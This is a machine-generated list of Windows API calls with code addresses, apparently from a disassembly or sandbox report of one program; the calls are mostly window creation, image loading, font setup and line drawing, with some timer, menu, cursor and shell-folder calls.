                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040C748
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C765
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040C774
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040C7B6
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040C7C7
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040C7EE
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040C817
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040C824
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040C833
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040C83B
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040C84D
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040C865
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040C87D
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040C8D0
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040C8E1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040C907
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040C912
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B028), ref: 0040C9A7
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040C9B1
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040C9BD
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040C9CB
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CA14
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CA25
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CA4B
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CA56
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B068), ref: 0040CAEB
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CAF5
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CB01
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CB0F
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040CB4D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040CB61
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040CB75
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CB92
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040CBA1
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040CBE3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040CBF4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040CC1B
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040CC44
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040CC51
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040CC60
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040CC68
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040CC7A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040CC92
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040CCAA
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0A8), ref: 0040CD3F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040CD49
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040CD55
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040CD63
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CDD7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CDF0
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CE01
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CE14
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE1F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040CE2E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040CE39
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040CE45
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040CE81
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040CE92
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040CEB8
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040CEC3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040CF37
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040CF50
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040CF61
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040CF74
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF7F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,0044A658), ref: 0040CF8E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A658,00000000), ref: 0040CF99
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A655), ref: 0040CFA5
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B0E8), ref: 0040D03A
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D044
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D050
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D05E
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D0A6
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D0B7
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D0DD
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D0E8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D15C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D175
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D186
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D199
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1A4
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D1B3
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D1BE
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D1CA
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B128), ref: 0040D25F
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D269
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D275
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D283
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B168), ref: 0040D325
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D32F
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D33B
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D349
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040D3BD
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040D3D6
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040D3E7
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040D3FA
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D405
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040D414
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040D41F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040D42B
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D469
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D47D
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D491
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D4AE
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D4BD
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D4FF
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D510
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D537
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D560
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D56D
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D57C
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D584
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D596
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D5AE
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D5C6
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D68B
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D69C
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D6C2
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D6CD
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1A8), ref: 0040D762
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040D76C
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040D778
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040D786
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040D80D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040D821
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040D835
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D852
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040D861
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040D8A3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D8B4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040D8DB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040D904
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040D911
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040D920
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040D928
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040D93A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040D952
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040D96A
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040D9BD
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040D9CE
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040D9F4
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040D9FF
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B1E8), ref: 0040DA94
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040DA9E
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040DAAA
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040DAB8
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DB03
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DB17
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DB2B
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DB48
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DB57
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DB99
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DBAA
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DBD1
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DBFA
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DC07
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DC16
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DC1E
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DC30
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DC48
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DC60
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040DCE6
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,?), ref: 0040DCFF
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040DD10
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040DD23
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD2E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,00000770), ref: 0040DD3D
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000770,00000000), ref: 0040DD48
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0000076D), ref: 0040DD54
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040DD90
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040DDA1
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040DDC7
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040DDD2
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040DE1D
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040DE31
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040DE45
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DE62
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040DE71
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040DEB3
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040DEC4
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040DEEB
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040DF14
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040DF21
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040DF30
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040DF38
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040DF4A
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040DF62
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040DF7A
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E00E
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E021
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E02C
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E038
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E049
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E05E
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,?,00000000), ref: 0040E06F
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E082
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E0C0
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E0D4
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E0E8
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E105
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E114
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E156
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E167
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E18E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E1B7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E1C4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E1D3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E1DB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000), ref: 0040E1F4
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E20C
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E224
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B228), ref: 0040E2B9
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E2C3
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E2CF
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E2DD
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E352
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E363
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E389
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E394
                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(0044B268), ref: 0040E43D
                                                                                                                                                                                                                          • SelectObject.GDI32(0044A655,00000000), ref: 0040E447
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000030,00000000,00000001), ref: 0040E453
                                                                                                                                                                                                                          • SetTextColor.GDI32(0044A655,?), ref: 0040E461
                                                                                                                                                                                                                          • GetDlgItem.USER32(0044A660,0000007B), ref: 0040E4F1
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040E502
                                                                                                                                                                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,?,00000001), ref: 0040E528
                                                                                                                                                                                                                          • InvalidateRect.USER32(00000000,00000000,00000001), ref: 0040E533
                                                                                                                                                                                                                          • CreateSolidBrush.GDI32(0014C8C8), ref: 0040E5B2
                                                                                                                                                                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0040E5C6
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000,00007F02), ref: 0040E5DA
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E5F7
                                                                                                                                                                                                                          • LoadIconA.USER32(00000000), ref: 0040E606
                                                                                                                                                                                                                          • CreateWindowExA.USER32(00000000,?,0043AB88,12CF0000,0000000A,0000001E,000002EE,000001F4,00000000,00000000,00000000,00000000), ref: 0040E646
                                                                                                                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040E657
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043AB90,00000000,5080000E,0000000A,0000000A,0000012C,0000012C,00000000,0000007B,00000000,00000000), ref: 0040E67E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,0043ABA0,00000000,50000080,0000015E,0000000A,00000140,00000140,00000000,0000007C,00000000,00000000), ref: 0040E6A7
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,0043ABB0), ref: 0040E6B4
                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00000172,00000000,00000000), ref: 0040E6C3
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0040E6CB
                                                                                                                                                                                                                          • LoadBitmapA.USER32(00000000,?), ref: 0040E6D3
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB4,00000000,0000012C,0000012C,00000010), ref: 0040E6EB
                                                                                                                                                                                                                          • LoadImageA.USER32(00000000,0043ABB8,00000000,0000012C,0000012C,00000010), ref: 0040E703
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E778
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64A,0044A652), ref: 0040E78B
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,0044A652,00000000), ref: 0040E796
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,0044A555), ref: 0040E7A2
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7B3
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,?,?), ref: 0040E7C8
                                                                                                                                                                                                                          • MoveToEx.GDI32(0044A654,0044A64D,00000008,00000000), ref: 0040E7D9
                                                                                                                                                                                                                          • LineTo.GDI32(0044A654,0044A64D,?), ref: 0040E7EC
                                                                                                                                                                                                                          • SHGetMalloc.SHELL32(?), ref: 0040E817
                                                                                                                                                                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0040E8D4
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,0000001F,00000000,00000000), ref: 0040EB38
                                                                                                                                                                                                                          • SetTimer.USER32(00000000,?,?,004225B0), ref: 0040EB65
                                                                                                                                                                                                                          • TrackPopupMenuEx.USER32(?,0044A650,00000008,?,0044A660,?), ref: 0040EB8C
                                                                                                                                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 0040EB99
                                                                                                                                                                                                                          • BeginPaint.USER32(0044A660,?), ref: 0040EBAE
                                                                                                                                                                                                                          • IsRectEmpty.USER32(?), ref: 0040EBBC
                                                                                                                                                                                                                          • GetSystemTime.KERNEL32(?), ref: 0040EBCE
                                                                                                                                                                                                                          • SetTimer.USER32(0044A660,00000001,?,004225B0), ref: 0040EBEC
                                                                                                                                                                                                                          • EndPaint.USER32(0044A660,?), ref: 0040EBF4
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC12
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040EC3B
                                                                                                                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040EC57
                                                                                                                                                                                                                          • GetClientRect.USER32(0044A660,?), ref: 0040EC6E
                                                                                                                                                                                                                          • StretchBlt.GDI32(00000000,?,?,?,?,00000000,00000000,00000000,00000001,00000001,00CC0020), ref: 0040ECB9
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0040ECEA
                                                                                                                                                                                                                          • DeleteDC.GDI32(00000000), ref: 0040ECF1
                                                                                                                                                                                                                          • GetCursorInfo.USER32(?), ref: 0040ED25
                                                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 0040ED53
                                                                                                                                                                                                                          • WindowFromPoint.USER32(?,?), ref: 0040ED67
                                                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0040ED74
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0040ED7C
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0040ED8C
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040ED96
                                                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 0040EDA2
                                                                                                                                                                                                                          • GetCursor.USER32 ref: 0040EDAC
                                                                                                                                                                                                                          • StrRetToStrA.SHLWAPI(?,00000000,?), ref: 0040EDE5
                                                                                                                                                                                                                          • _printf.LIBCMT ref: 0040EDFB
                                                                                                                                                                                                                          • EnumFontFamiliesA.GDI32(00000000,00000000,?,00000000), ref: 0040EE24
                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 0040EE2A
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0040EF28
                                                                                                                                                                                                                          • SendMessageA.USER32(0044A660,00000080,00000001,00000000), ref: 0040EF38
